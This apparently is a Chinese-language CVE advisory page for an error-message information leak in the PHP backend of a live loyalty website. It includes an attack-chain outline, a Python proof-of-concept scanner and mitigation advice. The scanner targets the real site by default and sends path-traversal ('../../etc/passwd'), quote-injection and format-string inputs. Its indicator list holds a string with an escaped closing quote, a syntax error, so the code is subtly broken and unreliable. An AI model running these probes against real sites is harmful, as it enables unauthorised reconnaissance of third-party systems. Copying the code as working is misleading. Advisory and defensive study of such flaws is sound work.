CVE-2025-52022 gemsloyalty.aptsys.com.sg PHP后端错误信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-52022

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

gemsloyalty.aptsys.com.sg (PHP后端)

漏洞概述

CVE-2025-52022是存在于gemsloyalty.aptsys.com.sg网站PHP后端中的一个信息泄露漏洞。该漏洞影响截至2025-05-28的版本，允许未经身份验证的远程攻击者通过向公共API端点发送特制的HTTP GET/POST请求，触发详细的错误消息。这些错误消息会泄露内部文件路径、代码片段和堆栈跟踪等敏感信息。攻击者可以利用这些泄露的信息深入了解系统架构、代码结构和文件组织方式，为进一步的攻击活动提供有价值的情报支持。该漏洞被归类为CWE-209（通过错误消息的信息暴露），属于OWASP Top 10中的敏感数据泄露类别。

技术细节

该漏洞存在于gemsloyalty.aptsys.com.sg的PHP后端应用程序中。当攻击者向公开的API端点发送精心构造的HTTP请求时，服务器会返回详细的错误信息。这些错误信息包含：1) 内部文件路径，暴露服务器目录结构；2) 代码片段，显示应用程序的部分源代码；3) 完整的堆栈跟踪，揭示函数调用链和数据库查询语句。攻击者无需任何认证即可触发此漏洞，只需构造特定格式的请求参数即可。由于PHP的错误处理机制未正确配置，生产环境中仍保留了详细的调试信息，攻击者可以利用这些信息进行侦察阶段的情报收集。

攻击链分析

STEP 1

侦察阶段

攻击者扫描目标网站gemsloyalty.aptsys.com.sg，识别公开的API端点

STEP 2

探测阶段

向识别的API端点发送特制的HTTP GET/POST请求，包含异常参数值

STEP 3

信息收集

服务器返回详细错误信息，泄露内部文件路径、代码片段和堆栈跟踪

STEP 4

情报分析

攻击者分析泄露的信息，了解系统架构、数据库结构和代码逻辑

STEP 5

后续攻击

利用收集的敏感信息，策划更高级的攻击，如SQL注入、文件包含或远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-52022 PoC - Information Disclosure via Error Messages
# Target: gemsloyalty.aptsys.com.sg

def test_vulnerability(target_url):
    """Test for CVE-2025-52022 Information Disclosure"""
    
    # Test different endpoints with malformed requests
    endpoints = [
        '/api/',
        '/api/v1/',
        '/api/endpoint',
        '/api.php',
        '/index.php'
    ]
    
    payloads = [
        {'param': 'test\''},  # SQL-like injection
        {'param': '../../etc/passwd'},  # Path traversal attempt
        {'param': '%s%s%s%s'},  # Format string
        {'param': None},  # Missing parameter
    ]
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        
        for i, payload in enumerate(payloads):
            try:
                # Test GET request
                response = requests.get(url, params=payload, timeout=10)
                
                # Check for information disclosure indicators
                indicators = [
                    'stack trace',
                    'Traceback',
                    '/var/www/',
                    'C:\inetpub\',
                    'Undefined index',
                    'Fatal error',
                    'Warning:',
                    'Exception',
                    '.php on line',
                    'Array',
                    'Stack',
                    'at '
                ]
                
                content = response.text.lower()
                found_indicators = [ind for ind in indicators if ind.lower() in content]
                
                if found_indicators:
                    print(f"[+] VULNERABLE: {url}")
                    print(f"    Payload: {payload}")
                    print(f"    Found indicators: {found_indicators}")
                    print(f"    Status code: {response.status_code}")
                    return True
                    
            except requests.exceptions.RequestException as e:
                print(f"[-] Error testing {url}: {e}")
    
    return False

if __name__ == '__main__':
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = 'https://gemsloyalty.aptsys.com.sg'
    
    print(f"[*] Testing CVE-2025-52022 on {target}")
    result = test_vulnerability(target)
    
    if result:
        print("\n[!] Target is vulnerable to information disclosure")
    else:
        print("\n[*] No vulnerability detected")

影响范围

gemsloyalty.aptsys.com.sg 所有版本（截至2025-05-28）

防御指南

临时缓解措施

在PHP配置文件（php.ini）中设置display_errors=Off，确保生产环境不显示详细错误信息；同时启用log_errors，将错误记录到日志文件而非显示给用户；对API端点实施输入验证，使用异常处理机制捕获错误并返回通用错误消息；部署Web应用防火墙检测异常请求模式；限制错误响应中包含的信息量，仅返回必要的状态码和通用错误描述。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-52022
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-52022
3 Details https://www.cvedetails.com/cve/CVE-2025-52022/
4 VulDB https://vuldb.com/cve/CVE-2025-52022
5 Link http://aptsys.com
6 Link https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39